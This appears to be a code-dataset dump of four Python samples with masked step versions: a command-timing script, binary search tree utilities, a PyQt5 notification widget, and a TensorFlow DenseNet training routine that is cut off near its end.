code (string, lengths 13-1.2M) | order_type (string, 1 value) | original_example (dict) | step_ids (list, lengths 1-5)
---|---|---|---
import os
import subprocess
import sys
import time
# print sys.argv
start = time.time()
subprocess.call(sys.argv[1:], shell=True)
stop = time.time()
print "\nTook %.1f seconds" % (stop - start)
|
normal
|
{
"blob_id": "530ec3df27cc4c8f0798566f0c66cfbffe510786",
"index": 8611,
"step-1": "import os\r\nimport subprocess\r\nimport sys\r\nimport time\r\n\r\n# print sys.argv\r\nstart = time.time()\r\nsubprocess.call(sys.argv[1:], shell=True)\r\nstop = time.time()\r\nprint \"\\nTook %.1f seconds\" % (stop - start)\r\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
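The first sample above is Python 2 code (print statement, shell=True with an argument list). A rough Python 3 sketch of the same command-timing wrapper, shown only for illustration and passing the argument list directly rather than through a shell:

import subprocess
import sys
import time

# Illustrative Python 3 rewrite of the wrapper above; not part of the dataset row.
start = time.time()
# Passing the list directly avoids the shell; with shell=True and a list,
# only the first element is treated as the shell command on POSIX.
subprocess.call(sys.argv[1:])
stop = time.time()
print("\nTook %.1f seconds" % (stop - start))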
from queue import Queue
class Node():
def __init__(self, value, left=None, right=None):
self.value = value
self.left = left
self.right = right
def array_to_tree_dfs(array):
n = len(array)
if n>0:
root = Node(array[0])
def dfs(node, index):
# if index >= n:
# return
# else:
if 2*(index+1) -1 < n and array[2*(index+1) -1] is not None:
node.left = Node(array[2*(index+1) -1])
dfs(node.left, 2*(index+1) -1)
if 2*(index+1) < n and array[2*(index+1)] is not None:
node.right = Node(array[2*(index+1)])
dfs(node.right, 2*(index+1))
return
dfs(root, 0)
return root
def tree_to_array_bfs(root):
q = Queue(maxsize = 0) # queue with infinity size
q.put(root)
array = []
def bfs():
if q.empty():
return
else:
node = q.get()
array.append(node.value)
if node.left != None:
q.put(node.left)
if node.right != None:
q.put(node.right)
bfs()
return
bfs()
return array
def findClosestValueInBst(tree, target):
distance = abs(tree.value - target)
value = tree.value
def dfs(node):
nonlocal distance, value
# stop condition
if(node is None):
return value
if(node.value == target):
return target
if abs(node.value - target) < distance:
value = node.value
distance = abs(value - target)
# recursion part
if(node.value > target):
return dfs(node.left)
elif(node.value < target):
return dfs(node.right)
return dfs(tree)
if __name__ == '__main__':
array = [5,3,10,2,4,8] + [None]*6 + [9] + [None]*2
root = array_to_tree_dfs(array)
new_array = tree_to_array_bfs(root)
print(new_array)
print(findClosestValueInBst(root, 6))
|
normal
|
{
"blob_id": "a52762fb13c04ced07a41a752578c4173d1eac42",
"index": 8350,
"step-1": "<mask token>\n\n\nclass Node:\n\n def __init__(self, value, left=None, right=None):\n self.value = value\n self.left = left\n self.right = right\n\n\n<mask token>\n\n\ndef tree_to_array_bfs(root):\n q = Queue(maxsize=0)\n q.put(root)\n array = []\n\n def bfs():\n if q.empty():\n return\n else:\n node = q.get()\n array.append(node.value)\n if node.left != None:\n q.put(node.left)\n if node.right != None:\n q.put(node.right)\n bfs()\n return\n bfs()\n return array\n\n\ndef findClosestValueInBst(tree, target):\n distance = abs(tree.value - target)\n value = tree.value\n\n def dfs(node):\n nonlocal distance, value\n if node is None:\n return value\n if node.value == target:\n return target\n if abs(node.value - target) < distance:\n value = node.value\n distance = abs(value - target)\n if node.value > target:\n return dfs(node.left)\n elif node.value < target:\n return dfs(node.right)\n return dfs(tree)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Node:\n\n def __init__(self, value, left=None, right=None):\n self.value = value\n self.left = left\n self.right = right\n\n\ndef array_to_tree_dfs(array):\n n = len(array)\n if n > 0:\n root = Node(array[0])\n\n def dfs(node, index):\n if 2 * (index + 1) - 1 < n and array[2 * (index + 1) - 1] is not None:\n node.left = Node(array[2 * (index + 1) - 1])\n dfs(node.left, 2 * (index + 1) - 1)\n if 2 * (index + 1) < n and array[2 * (index + 1)] is not None:\n node.right = Node(array[2 * (index + 1)])\n dfs(node.right, 2 * (index + 1))\n return\n dfs(root, 0)\n return root\n\n\ndef tree_to_array_bfs(root):\n q = Queue(maxsize=0)\n q.put(root)\n array = []\n\n def bfs():\n if q.empty():\n return\n else:\n node = q.get()\n array.append(node.value)\n if node.left != None:\n q.put(node.left)\n if node.right != None:\n q.put(node.right)\n bfs()\n return\n bfs()\n return array\n\n\ndef findClosestValueInBst(tree, target):\n distance = abs(tree.value - target)\n value = tree.value\n\n def dfs(node):\n nonlocal distance, value\n if node is None:\n return value\n if node.value == target:\n return target\n if abs(node.value - target) < distance:\n value = node.value\n distance = abs(value - target)\n if node.value > target:\n return dfs(node.left)\n elif node.value < target:\n return dfs(node.right)\n return dfs(tree)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Node:\n\n def __init__(self, value, left=None, right=None):\n self.value = value\n self.left = left\n self.right = right\n\n\ndef array_to_tree_dfs(array):\n n = len(array)\n if n > 0:\n root = Node(array[0])\n\n def dfs(node, index):\n if 2 * (index + 1) - 1 < n and array[2 * (index + 1) - 1] is not None:\n node.left = Node(array[2 * (index + 1) - 1])\n dfs(node.left, 2 * (index + 1) - 1)\n if 2 * (index + 1) < n and array[2 * (index + 1)] is not None:\n node.right = Node(array[2 * (index + 1)])\n dfs(node.right, 2 * (index + 1))\n return\n dfs(root, 0)\n return root\n\n\ndef tree_to_array_bfs(root):\n q = Queue(maxsize=0)\n q.put(root)\n array = []\n\n def bfs():\n if q.empty():\n return\n else:\n node = q.get()\n array.append(node.value)\n if node.left != None:\n q.put(node.left)\n if node.right != None:\n q.put(node.right)\n bfs()\n return\n bfs()\n return array\n\n\ndef findClosestValueInBst(tree, target):\n distance = abs(tree.value - target)\n value = tree.value\n\n def dfs(node):\n nonlocal distance, value\n if node is None:\n return value\n if node.value == target:\n return target\n if abs(node.value - target) < distance:\n value = node.value\n distance = abs(value - target)\n if node.value > target:\n return dfs(node.left)\n elif node.value < target:\n return dfs(node.right)\n return dfs(tree)\n\n\nif __name__ == '__main__':\n array = [5, 3, 10, 2, 4, 8] + [None] * 6 + [9] + [None] * 2\n root = array_to_tree_dfs(array)\n new_array = tree_to_array_bfs(root)\n print(new_array)\n print(findClosestValueInBst(root, 6))\n",
"step-4": "from queue import Queue\n\n\nclass Node:\n\n def __init__(self, value, left=None, right=None):\n self.value = value\n self.left = left\n self.right = right\n\n\ndef array_to_tree_dfs(array):\n n = len(array)\n if n > 0:\n root = Node(array[0])\n\n def dfs(node, index):\n if 2 * (index + 1) - 1 < n and array[2 * (index + 1) - 1] is not None:\n node.left = Node(array[2 * (index + 1) - 1])\n dfs(node.left, 2 * (index + 1) - 1)\n if 2 * (index + 1) < n and array[2 * (index + 1)] is not None:\n node.right = Node(array[2 * (index + 1)])\n dfs(node.right, 2 * (index + 1))\n return\n dfs(root, 0)\n return root\n\n\ndef tree_to_array_bfs(root):\n q = Queue(maxsize=0)\n q.put(root)\n array = []\n\n def bfs():\n if q.empty():\n return\n else:\n node = q.get()\n array.append(node.value)\n if node.left != None:\n q.put(node.left)\n if node.right != None:\n q.put(node.right)\n bfs()\n return\n bfs()\n return array\n\n\ndef findClosestValueInBst(tree, target):\n distance = abs(tree.value - target)\n value = tree.value\n\n def dfs(node):\n nonlocal distance, value\n if node is None:\n return value\n if node.value == target:\n return target\n if abs(node.value - target) < distance:\n value = node.value\n distance = abs(value - target)\n if node.value > target:\n return dfs(node.left)\n elif node.value < target:\n return dfs(node.right)\n return dfs(tree)\n\n\nif __name__ == '__main__':\n array = [5, 3, 10, 2, 4, 8] + [None] * 6 + [9] + [None] * 2\n root = array_to_tree_dfs(array)\n new_array = tree_to_array_bfs(root)\n print(new_array)\n print(findClosestValueInBst(root, 6))\n",
"step-5": "from queue import Queue\n\nclass Node():\n def __init__(self, value, left=None, right=None):\n self.value = value\n self.left = left\n self.right = right\n\n\ndef array_to_tree_dfs(array):\n n = len(array)\n if n>0:\n root = Node(array[0])\n\n def dfs(node, index):\n # if index >= n:\n # return\n # else:\n if 2*(index+1) -1 < n and array[2*(index+1) -1] is not None:\n node.left = Node(array[2*(index+1) -1])\n dfs(node.left, 2*(index+1) -1)\n if 2*(index+1) < n and array[2*(index+1)] is not None:\n node.right = Node(array[2*(index+1)])\n dfs(node.right, 2*(index+1))\n return\n dfs(root, 0)\n return root\n\n\ndef tree_to_array_bfs(root):\n q = Queue(maxsize = 0) # queue with infinity size\n q.put(root)\n array = []\n def bfs():\n if q.empty():\n return\n else:\n node = q.get()\n array.append(node.value)\n if node.left != None:\n q.put(node.left)\n if node.right != None:\n q.put(node.right)\n bfs()\n return\n bfs()\n return array\n\n \n\n\ndef findClosestValueInBst(tree, target):\n distance = abs(tree.value - target)\n value = tree.value\n \n def dfs(node):\n nonlocal distance, value\n # stop condition\n if(node is None):\n return value\n if(node.value == target):\n return target\n\n if abs(node.value - target) < distance:\n value = node.value\n distance = abs(value - target)\n\n # recursion part\n if(node.value > target):\n return dfs(node.left)\n elif(node.value < target):\n return dfs(node.right)\n\n return dfs(tree)\n\n\nif __name__ == '__main__':\n array = [5,3,10,2,4,8] + [None]*6 + [9] + [None]*2\n root = array_to_tree_dfs(array)\n new_array = tree_to_array_bfs(root) \n print(new_array)\n print(findClosestValueInBst(root, 6))\n \n\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
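In the sample above, array_to_tree_dfs uses heap-style indexing: for a 0-based index i, 2*(index+1)-1 reduces to 2*i+1 (left child) and 2*(index+1) to 2*i+2 (right child). As an illustrative alternative to the recursive findClosestValueInBst, an iterative search over the same Node structure could look like the sketch below (it assumes the Node class and array_to_tree_dfs from the sample are in scope; this is not part of the original row):

def find_closest_value_iterative(root, target):
    # Walk down the BST, keeping the best candidate seen so far.
    closest = root.value
    node = root
    while node is not None:
        if abs(node.value - target) < abs(closest - target):
            closest = node.value
        if closest == target:
            break
        # BST property: values closer to the target lie on the target's side.
        node = node.left if target < node.value else node.right
    return closest

# For the example array in the sample, find_closest_value_iterative(root, 6)
# agrees with findClosestValueInBst(root, 6) and returns 5.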
import sys
import time
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5 import *
class PromptMessage(QWidget):
def __init__(self, parent = None):
super(PromptMessage,self).__init__(parent)
self.m_show_tm = QTimer()
self.m_stay_tm = QTimer()
self.m_close_tm = QTimer()
self.m_point = QPoint()
self.m_stay=2
def set_stay(self, stay):
self.m_stay = stay
def show_message(self, message_list):
self.m_show_tm.timeout.connect(self.on_move)
layout=QGridLayout()
num=len(message_list)
for i in range(num):
label=QLabel()
label.setText(message_list[i])
layout.addWidget(label, i, 0)
self.setLayout(layout)
self.adjustSize()
rect = QApplication.desktop().availableGeometry()
rect1 = QApplication.desktop().screenGeometry ()
self.m_desktop_height=rect.height()
self.setMaximumSize(int(rect.width() * 0.1), int(rect.height() * 0.1))  # PyQt5 expects integer pixel sizes
self.setWindowFlags(Qt.FramelessWindowHint)
self.m_point.setX(rect.width() - self.width())
self.m_point.setY(rect.height() - self.height() - (rect1.height() - rect.height()))
#self.move(self.m_point)
self.setWindowOpacity(0.8)
self.show()
self.m_show_tm.start(100)
def on_move(self):
self.m_desktop_height = self.m_desktop_height - 10
self.move(self.m_point.x(), self.m_desktop_height)
if self.m_desktop_height <= self.m_point.y():
self.m_show_tm.stop()
time.sleep(self.m_stay)
self.close()
import sys
def logs():
print(sys._getframe().f_code.co_name)
print(sys._getframe().f_back.f_code.co_name)
print(sys._getframe().f_back.f_lineno)
print(sys._getframe().f_back.f_code.co_filename)
def get_cur_info() :
logs()  # simulate writing a log entry
if __name__ == "__main__":
from CommonAPI.Log import LOG_ERROR
|
normal
|
{
"blob_id": "18a49d46b39fe6e00e2ad137984cceab82f1e94b",
"index": 2422,
"step-1": "<mask token>\n\n\nclass PromptMessage(QWidget):\n <mask token>\n <mask token>\n <mask token>\n\n def on_move(self):\n self.m_desktop_height = self.m_desktop_height - 10\n self.move(self.m_point.x(), self.m_desktop_height)\n if self.m_desktop_height <= self.m_point.y():\n self.m_show_tm.stop()\n time.sleep(self.m_stay)\n self.close()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass PromptMessage(QWidget):\n <mask token>\n\n def set_stay(self, stay):\n self.m_stay = stay\n\n def show_message(self, message_list):\n self.m_show_tm.timeout.connect(self.on_move)\n layout = QGridLayout()\n num = len(message_list)\n for i in range(num):\n label = QLabel()\n label.setText(message_list[i])\n layout.addWidget(label, i, 0)\n self.setLayout(layout)\n self.adjustSize()\n rect = QApplication.desktop().availableGeometry()\n rect1 = QApplication.desktop().screenGeometry()\n self.m_desktop_height = rect.height()\n self.setMaximumSize(rect.width() * 0.1, rect.height() * 0.1)\n self.setWindowFlags(Qt.FramelessWindowHint)\n self.m_point.setX(rect.width() - self.width())\n self.m_point.setY(rect.height() - self.height() - (rect1.height() -\n rect.height()))\n self.setWindowOpacity(0.8)\n self.show()\n self.m_show_tm.start(100)\n\n def on_move(self):\n self.m_desktop_height = self.m_desktop_height - 10\n self.move(self.m_point.x(), self.m_desktop_height)\n if self.m_desktop_height <= self.m_point.y():\n self.m_show_tm.stop()\n time.sleep(self.m_stay)\n self.close()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass PromptMessage(QWidget):\n\n def __init__(self, parent=None):\n super(PromptMessage, self).__init__(parent)\n self.m_show_tm = QTimer()\n self.m_stay_tm = QTimer()\n self.m_close_tm = QTimer()\n self.m_point = QPoint()\n self.m_stay = 2\n\n def set_stay(self, stay):\n self.m_stay = stay\n\n def show_message(self, message_list):\n self.m_show_tm.timeout.connect(self.on_move)\n layout = QGridLayout()\n num = len(message_list)\n for i in range(num):\n label = QLabel()\n label.setText(message_list[i])\n layout.addWidget(label, i, 0)\n self.setLayout(layout)\n self.adjustSize()\n rect = QApplication.desktop().availableGeometry()\n rect1 = QApplication.desktop().screenGeometry()\n self.m_desktop_height = rect.height()\n self.setMaximumSize(rect.width() * 0.1, rect.height() * 0.1)\n self.setWindowFlags(Qt.FramelessWindowHint)\n self.m_point.setX(rect.width() - self.width())\n self.m_point.setY(rect.height() - self.height() - (rect1.height() -\n rect.height()))\n self.setWindowOpacity(0.8)\n self.show()\n self.m_show_tm.start(100)\n\n def on_move(self):\n self.m_desktop_height = self.m_desktop_height - 10\n self.move(self.m_point.x(), self.m_desktop_height)\n if self.m_desktop_height <= self.m_point.y():\n self.m_show_tm.stop()\n time.sleep(self.m_stay)\n self.close()\n\n\n<mask token>\n\n\ndef logs():\n print(sys._getframe().f_code.co_name)\n print(sys._getframe().f_back.f_code.co_name)\n print(sys._getframe().f_back.f_lineno)\n print(sys._getframe().f_back.f_code.co_filename)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass PromptMessage(QWidget):\n\n def __init__(self, parent=None):\n super(PromptMessage, self).__init__(parent)\n self.m_show_tm = QTimer()\n self.m_stay_tm = QTimer()\n self.m_close_tm = QTimer()\n self.m_point = QPoint()\n self.m_stay = 2\n\n def set_stay(self, stay):\n self.m_stay = stay\n\n def show_message(self, message_list):\n self.m_show_tm.timeout.connect(self.on_move)\n layout = QGridLayout()\n num = len(message_list)\n for i in range(num):\n label = QLabel()\n label.setText(message_list[i])\n layout.addWidget(label, i, 0)\n self.setLayout(layout)\n self.adjustSize()\n rect = QApplication.desktop().availableGeometry()\n rect1 = QApplication.desktop().screenGeometry()\n self.m_desktop_height = rect.height()\n self.setMaximumSize(rect.width() * 0.1, rect.height() * 0.1)\n self.setWindowFlags(Qt.FramelessWindowHint)\n self.m_point.setX(rect.width() - self.width())\n self.m_point.setY(rect.height() - self.height() - (rect1.height() -\n rect.height()))\n self.setWindowOpacity(0.8)\n self.show()\n self.m_show_tm.start(100)\n\n def on_move(self):\n self.m_desktop_height = self.m_desktop_height - 10\n self.move(self.m_point.x(), self.m_desktop_height)\n if self.m_desktop_height <= self.m_point.y():\n self.m_show_tm.stop()\n time.sleep(self.m_stay)\n self.close()\n\n\n<mask token>\n\n\ndef logs():\n print(sys._getframe().f_code.co_name)\n print(sys._getframe().f_back.f_code.co_name)\n print(sys._getframe().f_back.f_lineno)\n print(sys._getframe().f_back.f_code.co_filename)\n\n\ndef get_cur_info():\n logs()\n\n\n<mask token>\n",
"step-5": "import sys\nimport time\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import *\n\n\nclass PromptMessage(QWidget):\n def __init__(self, parent = None):\n super(PromptMessage,self).__init__(parent)\n self.m_show_tm = QTimer()\n self.m_stay_tm = QTimer()\n self.m_close_tm = QTimer()\n self.m_point = QPoint()\n self.m_stay=2\n \n def set_stay(self, stay):\n self.m_stay = stay \n \n def show_message(self, message_list):\n self.m_show_tm.timeout.connect(self.on_move)\n layout=QGridLayout()\n num=len(message_list)\n for i in range(num):\n label=QLabel()\n label.setText(message_list[i])\n layout.addWidget(label, i, 0)\n self.setLayout(layout) \n\n self.adjustSize()\n rect = QApplication.desktop().availableGeometry()\n rect1 = QApplication.desktop().screenGeometry ()\n self.m_desktop_height=rect.height()\n self.setMaximumSize(rect.width() * 0.1, rect.height() * 0.1)\n self.setWindowFlags(Qt.FramelessWindowHint);\n self.m_point.setX(rect.width() - self.width())\n self.m_point.setY(rect.height() - self.height() - (rect1.height() - rect.height()))\n #self.move(self.m_point)\n self.setWindowOpacity(0.8) \n self.show()\n self.m_show_tm.start(100)\n def on_move(self):\n self.m_desktop_height = self.m_desktop_height - 10\n self.move(self.m_point.x(), self.m_desktop_height)\n if self.m_desktop_height <= self.m_point.y():\n self.m_show_tm.stop()\n time.sleep(self.m_stay)\n self.close()\n \nimport sys \ndef logs(): \n print(sys._getframe().f_code.co_name)\n print(sys._getframe().f_back.f_code.co_name)\n print(sys._getframe().f_back.f_lineno)\n print(sys._getframe().f_back.f_code.co_filename)\ndef get_cur_info() : \n logs() #模拟写日志 \n \nif __name__ == \"__main__\":\n from CommonAPI.Log import LOG_ERROR\n \n ",
"step-ids": [
2,
4,
6,
7,
10
]
}
|
[
2,
4,
6,
7,
10
] |
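The __main__ guard in the sample above only imports CommonAPI.Log and never constructs the widget. A minimal, hypothetical driver for PromptMessage, assuming PyQt5 is installed and the class above is in scope (the message strings are placeholders), might look like:

import sys
from PyQt5.QtWidgets import QApplication

if __name__ == '__main__':
    app = QApplication(sys.argv)
    prompt = PromptMessage()  # class defined in the sample above
    prompt.set_stay(2)        # seconds the message stays visible before closing
    prompt.show_message(['Build finished', 'No errors reported'])
    sys.exit(app.exec_())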
def densenet(D,DT,F,model):
import scipy.io as sio
import time
import os
import math
import numpy as np
import matplotlib.pyplot as plt
Dataset = D
if DT == 'org':
data_type = 'original'
else:
data_type = 'augmented'
fs = model.fs
fm1 = model.fm1
batch_size = model.batch_size[0]
learn_rate = model.learn_rate
num_layers = model.num_layers
k_fm = model.k_fm
bottleneck = model.bottleneck
dropout_prob = model.dropout_prob
num_of_test = model.num_of_test
###############
# load training / testing set from CrossVal folder,
# names for training set, 'D1_1st_fold_train.mat', 'Augmented_D1_1st_fold_train.mat'
# name for testing set, 'D1_1st_fold_test.mat'
###############
if F == 1:
file_name = '1st_fold'
elif F == 2:
file_name = '2nd_fold'
elif F == 3:
file_name = '3rd_fold'
elif F == 4:
file_name = '4th_fold'
elif F == 5:
file_name = '5th_fold'
path = os.path.join('CrossVal', 'D'+Dataset)
print("path " ,path)
if data_type == 'original':
Train =sio.loadmat(os.path.join(path, 'D'+Dataset+'_'+file_name+'_train.mat'))
else:
Train =sio.loadmat(os.path.join(path, 'Augmented_D'+Dataset+'_'+file_name+'_train.mat'))
Test = sio.loadmat(os.path.join(path, 'D'+Dataset+'_'+file_name+'_test.mat'))
if Dataset == '1':
number_of_classes = 24
num_of_ep = 50
num_of_test = 20
if data_type == 'augmented':
train_imgs = 526190
else:
train_imgs = 52619
iteration = math.ceil((num_of_ep * train_imgs) / batch_size)
elif Dataset == '2':
number_of_classes = 36
num_of_ep = 200
if data_type == 'augmented':
train_imgs = 20120
else:
train_imgs = 2012
iteration = math.ceil((num_of_ep * train_imgs) / batch_size)
else:
number_of_classes = 10
num_of_ep = 200
if data_type == 'augmented':
train_imgs = 16000
else:
train_imgs = 1600
iteration = math.ceil((num_of_ep * train_imgs) / batch_size)
iteration_to_display = int(iteration / num_of_test)
list_to_display = []
for i in range(num_of_test):
if i !=num_of_test:
list_to_display.append(int(iteration_to_display*(i+1)))
del i
total_fm_Block_1 = fm1+(num_layers*k_fm)
total_fm_Block_2 = total_fm_Block_1+(num_layers*k_fm)
total_fm_Block_3 = total_fm_Block_2+(num_layers*k_fm)
fc_nodes = [total_fm_Block_3 ]
Train_Images = Train['trainImages']
Train_Labels = Train['trainLabels2']
total_trainImages = len(Train_Images[0,2])
print(total_trainImages)
Train_Images = Train_Images.reshape(784,total_trainImages).transpose().astype('float32')
Train_Labels = Train_Labels.transpose().astype('float64')
Test_Images = Test['testImages']
Test_Labels = Test['testLabels2']
total_testImages = len(Test_Images[0,2])
Test_Images = Test_Images.reshape(784,total_testImages).transpose().astype('float32')
Test_Labels = Test_Labels.transpose().astype('float64')
Target_labels = np.argmax(Test_Labels,axis=1)
del Test
del Train
import tensorflow as tf
tf.reset_default_graph()
g = tf.Graph()
with g.as_default():
tf.set_random_seed(1)
def weight_variable(shape,n):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial,name=n)
def bias_variable(shape,n):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial,name=n)
def avg_pool(input, s):
return tf.nn.avg_pool(input, [ 1, s, s, 1 ], [1, s, s, 1 ], 'SAME')
def max_pool(input, s):
return tf.nn.max_pool(input, [ 1, s, s, 1 ], [1, s, s, 1 ], 'SAME')
def conv2d_1(input, in_features, out_features, kernel_size, name="W", with_bias=False):
W = weight_variable([ kernel_size, kernel_size, in_features, out_features], name)
conv = tf.nn.conv2d(input, W, [ 1, 1, 1, 1 ], padding='SAME')
if with_bias:
return conv + bias_variable([ out_features ])
return conv
def batch_activ_conv(current, in_features, out_features, kernel_size, is_training, keep_prob, idx, scope='conv_block'):
with tf.variable_scope(scope):
current = tf.layers.batch_normalization(current, scale=True, training=is_training)
current = tf.nn.relu(current)
current = conv2d_1(current, in_features, out_features, kernel_size, name="W"+str(idx))
current = tf.nn.dropout(current, keep_prob)
return current
def block(input, layers, in_features, growth, is_training, keep_prob, name="Block_"):
with tf.name_scope(name):
with tf.variable_scope(name):
current = input
features = in_features
for idx in range(layers):
tmp = batch_activ_conv(current, features, growth, fs, is_training, keep_prob, idx+1, scope='conv_block_'+str(idx+1))
current = tf.concat((current, tmp), axis=3)
features += growth
return current, features
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])
x_image = tf.reshape(x, [-1, 28, 28, 1])
keep_prob = tf.placeholder(tf.float32)
training = tf.placeholder(tf.bool)
current = conv2d_1(x_image, 1, fm1, fs, name="W1", with_bias=False)
current, features = block(current, num_layers, fm1, k_fm, training, keep_prob, name="Block_1")
b1_conv_printop = tf.Print(current, [current])
with tf.name_scope("transition_lyr"):
#current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_1')
current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_1')
t1_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_1_1')
t1_conv_printop = tf.Print(current, [current])
current = max_pool(current, 2)
#current = avg_pool(current, 2)
current, features = block(current, num_layers, features, k_fm, training, keep_prob, name="Block_2")
b2_conv_printop = tf.Print(current, [current])
with tf.name_scope("transition_lyr_2"):
#current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_2')
current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_2')
t2_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_2_1')
t2_conv_printop = tf.Print(current, [current])
current = max_pool(current, 2)
#current = avg_pool(current, 2)
current, features = block(current, num_layers, features, k_fm, training, keep_prob, name="Block_3")
b3_conv_printop = tf.Print(current, [current])
with tf.name_scope("transition_lyr_3"):
#current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_3')
current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_3')
t3_b_conv_printop = tf.Print(current, [current])
current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_3_1')
t3_conv_printop = tf.Print(current, [current])
current = avg_pool(current, 7)
current = tf.reshape(current, [tf.shape(current)[0], -1])
with tf.name_scope("Dense_Last_lyr"):
W_fc3 = weight_variable([fc_nodes[0], number_of_classes],"w_fc3")
b_fc3 = bias_variable([number_of_classes],"b_fc3")
y_conv = tf.matmul(current, W_fc3) + b_fc3
prediction_prob = tf.nn.softmax(y_conv)
prediction_prob_printop = tf.Print(prediction_prob, [prediction_prob])
with tf.name_scope("Xent"):
cross_entropy = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))
with tf.name_scope("train"):
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(extra_update_ops):
train_step = tf.train.AdamOptimizer(learn_rate).minimize(cross_entropy)
with tf.name_scope("accuracy"):
correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
wrong_prediction_printop = tf.Print(wrong_prediction, [wrong_prediction])
predicted_labels = tf.argmax(y_conv, 1)
predicted_labels_printop = tf.Print(predicted_labels, [predicted_labels])
index = 0
index_end = index + batch_size
remaining = 0
start_time = time.time()
costs = []
accuracy_list = []
list_of_predicted_list = []
with tf.Session() as sess:
sess.run(tf.global_variables_initializer(),tf.set_random_seed(0))
for i in range(iteration):
if index_end > total_trainImages:
remaining = total_trainImages - (index_end-batch_size)
images = Train_Images[(index_end-batch_size):total_trainImages, :]
labels = Train_Labels[(index_end-batch_size):total_trainImages, :]
index = 0
index_end = index + batch_size - remaining
images = np.vstack((images, Train_Images[index:index_end, :]))
labels = np.vstack((labels, Train_Labels[index:index_end, :]))
batch = (images, labels)
index = index_end
index_end = index + batch_size
else:
batch = (Train_Images[index:index_end, :], Train_Labels[index:index_end, :])
index = index + batch_size
index_end = index_end + batch_size
if i in list_to_display:
elapsed_time = time.time() - start_time
print('Elapsed Time Before for loop: %f secs' % elapsed_time)
Accuracy = 0
itrt_index = i
print('debug: %d & %d' % (iteration,i))
if Dataset == '1':
if file_name == '5th_fold':
num_test = 13154
else:
num_test = 13155
elif Dataset == '2':
num_test = 503
elif Dataset == '3':
num_test = 400
print(num_test)
for img_index in range(num_test):
t_image = np.array(Test_Images[img_index,:]).reshape(1,784)
t_label = np.array(Test_Labels[img_index,:]).reshape(1,number_of_classes)
test_acc = accuracy.eval(feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
Accuracy += test_acc
wrong, predicted, prediction_prob = sess.run([wrong_prediction_printop,
predicted_labels_printop,prediction_prob_printop],
feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
if img_index <= 3:
b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([b1_conv_printop, b2_conv_printop, b3_conv_printop,
t1_conv_printop,t2_conv_printop, t3_conv_printop, t1_b_conv_printop, t2_b_conv_printop, t3_b_conv_printop],
feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
if img_index == 0:
b1_list = b1
b2_list = b2
b3_list = b3
t1_list = t1
t2_list = t2
t3_list = t3
t1_b_list = t1_b
t2_b_list = t2_b
t3_b_list = t3_b
else:
b1_list = np.append(b1_list,b1,axis=0)
b2_list = np.append(b2_list,b2,axis=0)
b3_list = np.append(b3_list,b3,axis=0)
t1_list = np.append(t1_list,t1,axis=0)
t2_list = np.append(t2_list,t2,axis=0)
t3_list = np.append(t3_list,t3,axis=0)
t1_b_list = np.append(t1_b_list,t1_b,axis=0)
t2_b_list = np.append(t2_b_list,t2_b,axis=0)
t3_b_list = np.append(t3_b_list,t3_b,axis=0)
if img_index == 0 :
wrong_list_1 = wrong
predicted_list_1 = predicted
prediction_prob_1 = prediction_prob
else:
wrong_list_1 = np.append(wrong_list_1,wrong,axis=0)
predicted_list_1 = np.append(predicted_list_1,predicted,axis=0)
prediction_prob_1 = np.append(prediction_prob_1, prediction_prob)
Accuracy = Accuracy/num_test
accuracy_list.append(Accuracy)
list_of_predicted_list.append(predicted_list_1)
print('Average test accuracy: %g' % Accuracy)
epoch_around = math.ceil((itrt_index * batch_size) / total_trainImages)
sio.savemat('D'+Dataset+'_'+file_name+'_'+str(epoch_around)+'ep_'+data_type+'_predicted_labels_list.mat', {'wrong_list':wrong_list_1, 'predicted_list': predicted_list_1, 'Target_labels':Target_labels,
'prediction_prob':prediction_prob, 'b1_list':b1_list, 'b2_list':b2_list, 'b3_list':b3_list, 't1_list':t1_list,
't2_list':t2_list, 't3_list':t3_list, 't1_b_list':t1_b_list, 't2_b_list':t2_b_list, 't3_b_list':t3_b_list})
elapsed_time = time.time() - start_time
print('Elapsed Time: %f secs' % elapsed_time)
print('Batch Size & Iteration & Total Train Imgs : %d & %d & %d' % (batch_size, itrt_index, total_trainImages))
print('learning_rate : %g ' % learn_rate)
print('1st conv FMaps : %d ' % fm1)
